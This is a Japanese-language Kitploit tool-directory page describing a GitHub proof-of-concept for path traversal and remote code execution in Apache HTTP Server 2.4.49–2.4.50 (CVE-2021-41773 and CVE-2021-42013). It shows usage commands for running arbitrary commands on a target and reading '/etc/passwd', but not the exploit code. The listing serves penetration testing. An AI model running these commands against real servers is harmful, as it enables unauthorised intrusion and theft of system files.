Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution — Apache HTTP-Server 2.4.49-2.4.50 パストラバーサル & リモートコード実行 PoC (CVE-2021-41773 & CVE-2021-42013) | Kitploit
ツール/GitHubGitHub/blackn0te/apache-http-server-2.4.49-2.4.50-path-traversal-remote-code-execution
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubblackn0te/apache-http-server-2.4.49-2.4.50-path-traversal-remote-code-execution

Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution

Apache HTTP-Server 2.4.49-2.4.50 パストラバーサル & リモートコード実行 PoC (CVE-2021-41773 & CVE-2021-42013)

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
130年前未レビュー

Apache HTTP-Server 2.4.49-2.4.50 パストラバーサル & リモートコード実行

説明

これは CVE-2021-41773 および CVE-2021-42013 の PoC スクリプトです。

使用方法:

root@kitploit:~
python3 exploit.py <rhost> <rport> <option> <cmd> | <file-absolute-path>

例:

リモートコード実行

root@kitploit:~
python3 exploit.py 127.0.0.1 8080 rce 'id'

rce

パストラバーサル

root@kitploit:~
python3 exploit.py 127.0.0.1 8080 file '/etc/passwd'

path_traversal

ツールをダウンロード